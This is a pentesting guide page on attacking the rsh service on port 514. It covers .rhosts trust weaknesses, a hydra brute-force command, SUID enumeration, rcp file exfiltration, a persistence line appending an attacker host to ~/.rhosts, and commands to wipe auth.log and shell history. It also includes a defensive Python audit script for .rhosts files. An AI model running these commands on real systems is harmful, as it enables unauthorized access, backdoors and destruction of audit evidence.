# Rsh - Port 514

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}

## Basic Info <a href="#basic-information" id="basic-information"></a>

**Rsh** authenticated clients through **.rhosts** files and **/etc/hosts.equiv**: trust was granted to host names, so it rested entirely on the client's IP address and on the Domain Name System (DNS) resolving that address to a trusted name. Because IP addresses are easy to spoof, notably on the local network, this was a significant weakness.

Moreover, **.rhosts** files were commonly placed in users' home directories, which were often located on Network File System (NFS) volumes, so the trust file itself was exposed to anyone who could write to that share.

**Default port**: 514

## Login <a href="#login" id="login"></a>

```
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>
```

***

## Attack Vectors <a href="#attack-vectors" id="attack-vectors"></a>

### Exploiting Weak Authentication <a href="#exploiting-weak-authentication" id="exploiting-weak-authentication"></a>

Check for weak authentication mechanisms. RSH often relies on the `.rhosts` file for authentication, which can be easily exploited if not properly configured.

### Brute Force Attacks <a href="#brute-force-attacks" id="brute-force-attacks"></a>

You can perform brute-force attacks to guess weak passwords using tools like `hydra`:

```
hydra -l <username> -P /path/to/passwords.txt <target_ip> rsh
```

This command attempts to brute-force the specified RSH server.

### Exploiting Misconfigurations <a href="#exploiting-misconfigurations" id="exploiting-misconfigurations"></a>

Look for misconfigured `.rhosts` files that allow unauthorized access. For example, a `.rhosts` file with the following entry can be exploited:

```
+ +
```

This entry allows any user from any host to log in without a password.

***

## Post-Exploitation <a href="#post-exploitation" id="post-exploitation"></a>

### Privilege Escalation <a href="#privilege-escalation" id="privilege-escalation"></a>

After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:

```
rsh <remote-server-ip> -l <username> find / -perm -4000 -type f 2>/dev/null
```

This command lists all SUID binaries; any that are misconfigured or outdated may be usable for privilege escalation.

### Data Exfiltration <a href="#data-exfiltration" id="data-exfiltration"></a>

Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the `rcp` (remote copy) command:

```
rcp <remote-server-ip>:<remote-file-path> <local-file-path>
```

### Persistent Access <a href="#persistent-access" id="persistent-access"></a>

To maintain persistent access, you can add your SSH key to the `~/.ssh/authorized_keys` file or modify the `.rhosts` file to allow your host:

```
echo "attacker-ip attacker-user" >> ~/.rhosts
```

This entry grants `attacker-user` on `attacker-ip` passwordless rsh login as the owner of the `.rhosts` file.
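As an added example (not part of the original page or of any tool it mentions), the following Python audits an rsh trust file for the `+ +` entry discussed under Exploiting Misconfigurations and for the kind of host/user line appended under Persistent Access, and applies the ownership and write-permission rules under which BSD `ruserok()` ignores a `.rhosts` file. The sample file contents, the risk labels and the `mode`/`owned_by_user` parameters are constructed for this example.

```python
# Added example for this page (not the original text's tooling): audits an rsh trust file.
# The risk scale and sample file are constructed; '+' is the rhosts wildcard, '-' a deny.
import stat
def parse_rhosts(text):
    """Return (host, user) pairs; an empty user means 'same username as the account'."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if line:
            fields = line.split()
            entries.append((fields[0], fields[1] if len(fields) > 1 else ""))
    return entries

def classify(host, user):
    """Rate one trust entry; '+' is the wildcard, '-' a deny, '+@name' a NIS netgroup."""
    if host.startswith("-") or user.startswith("-"):
        return "info"       # explicit deny entry, grants nothing
    if host == "+":
        return "critical"   # any host may log in ('+ +' = any user from any host, no password)
    if user == "+":
        return "high"       # any account on the named host may log in as this user
    if host.startswith("+@") or user.startswith("+@"):
        return "medium"     # trust delegated to a netgroup; review its membership
    return "low"            # single trusted host, still only as strong as IP/DNS

def audit(text, mode=0o600, owned_by_user=True):
    """Return findings for risky entries and for a file that others could have edited."""
    findings = []
    if not owned_by_user:
        findings.append("file: not owned by the account (BSD ruserok() skips it; check who wrote it)")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("file: group/world writable; any local user could append trust entries")
    for host, user in parse_rhosts(text):
        level = classify(host, user)
        if level != "info":
            findings.append("%s: host=%s user=%s" % (level, host, user or "<same>"))
    return findings

# Constructed sample .rhosts: the '+ +' misconfiguration, a persistence-style entry, benign lines.
SAMPLE_RHOSTS = """\
buildhost.example.internal +
+ +
+@admins
nfs01.example.internal
attacker-host.example.internal attacker-user
-oldhost.example.internal
"""
if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_RHOSTS, mode=0o664)))
```

Run it against a real file with `audit(open(path).read(), mode=os.stat(path).st_mode, owned_by_user=os.stat(path).st_uid in (0, os.getuid()))`; the `hosts.equiv` format is the same, so the same audit applies there.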

### Covering Tracks <a href="#covering-tracks" id="covering-tracks"></a>

It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:

```
rsh <remote-server-ip> -l <username> echo "" > /var/log/auth.log
rsh <remote-server-ip> -l <username> history -c
```

These commands are intended to clear the authentication log and the command history. Note that, as written, the `>` redirect is interpreted by the local shell rather than the remote one, and `history -c` only affects the non-interactive shell that rsh spawned. From a defender's perspective, an auth.log that has suddenly been emptied is itself a strong indicator of tampering.

***


